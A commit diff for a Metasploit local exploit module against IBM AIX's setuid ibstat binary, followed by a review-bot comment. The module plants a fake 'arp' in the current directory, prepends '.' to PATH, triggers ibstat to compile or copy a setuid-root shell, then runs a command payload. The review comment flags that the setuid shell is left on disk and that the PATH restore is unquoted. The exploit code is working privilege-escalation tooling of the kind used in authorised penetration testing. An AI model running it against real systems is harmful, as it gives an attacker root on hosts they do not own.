Switch post module to fixed exploit module.
parent
1d9e788649
commit
e6c1dd3f9e
|
@ -17,8 +17,8 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'Author' =>
|
||||
[
|
||||
'Kristian Erik Hermansen', #original author
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #msf module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #Metasploit module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -28,14 +28,21 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
|
||||
],
|
||||
'Platform' => [ 'aix' ],
|
||||
'Arch' => [ 'ppc' ],
|
||||
'Targets' =>
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'perl',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'IBM AIX Version 6.1', {} ],
|
||||
[ 'IBM AIX Version 7.1', {} ],
|
||||
],
|
||||
'RequiredCmd' => 'generic',
|
||||
'DefaultTarget' => 1,
|
||||
'DisclosureDate'=> "Sep 24 2013",
|
||||
))
|
||||
|
@ -45,11 +52,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def check
|
||||
ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if ls_output.include? ("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if ls_output.include? ("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -67,7 +74,7 @@ int main()
|
|||
{
|
||||
setreuid(0,0);
|
||||
setregid(0,0);
|
||||
execve("/bin/sh",NULL.NULL);
|
||||
execve("/bin/sh",NULL,NULL);
|
||||
return 0;
|
||||
}
|
||||
^
|
||||
|
@ -92,40 +99,50 @@ chmod 4555 #{root_file}
|
|||
write_file("#{arp_file}",arp)
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
print_status("Custom arp file written")
|
||||
print_status("Updating PATH environment variable...")
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec 'PATH=.:$PATH'
|
||||
cmd_exec 'export PATH'
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
print_status("Removing custom arp...")
|
||||
file_rm("#{arp_file}")
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
|
||||
cmd_exec "#{root_file}"
|
||||
print_status("Checking root privileges...")
|
||||
is_root?
|
||||
if is_root?
|
||||
print_status("Executing payload...")
|
||||
cmd_exec "#{payload.encoded}"
|
||||
end
|
||||
end
|
||||
|
||||
def gcc_installed?
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_version = cmd_exec 'gcc -v'
|
||||
gcc_array = gcc_version.split("\n")
|
||||
gcc_array.each do |res|
|
||||
if res.include? ("gcc version")
|
||||
print_good("gcc found! (#{res})")
|
||||
return true
|
||||
end
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_version = cmd_exec 'gcc -v'
|
||||
gcc_array = gcc_version.split("\n")
|
||||
gcc_array.each do |res|
|
||||
if res.include? ("gcc version")
|
||||
print_good("gcc found! (#{res})")
|
||||
return true
|
||||
end
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
|
||||
def is_root?
|
||||
id_output = cmd_exec "id"
|
||||
if id_output.include? ("euid=0(root)")
|
||||
print_good("Got root! (euid)")
|
||||
elsif id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
else
|
||||
print_status("Exploit failed")
|
||||
return true
|
||||
end
|
||||
if id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
return true
|
||||
end
|
||||
print_status("Exploit failed")
|
||||
false
|
||||
end
|
||||
end
|
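Review bot: The setuid file at `root_file` (the hunk header shows `chmod 4555 #{root_file}`) appears to be left on disk when `exploit` returns, because the new tail removes only `arp_file` with `file_rm` before running `root_file` and the payload. Left in place, a world-executable setuid-root shell would let any local user on the assessed host become root long after the test. `exploit` begins above this hunk, so unless the file is already registered for cleanup there, remove it once the payload step has run, e.g. `file_rm("#{root_file}")`. The PATH restore has a related gap: `cmd_exec "PATH=#{path_env}"` pastes the captured value into a shell line unquoted, so an entry containing a space or shell metacharacter is re-parsed by the shell and the session may keep `.` at the front of PATH. Quoting the value, `cmd_exec "PATH='#{path_env}'"`, is safer, though a value containing a single quote would still need escaping.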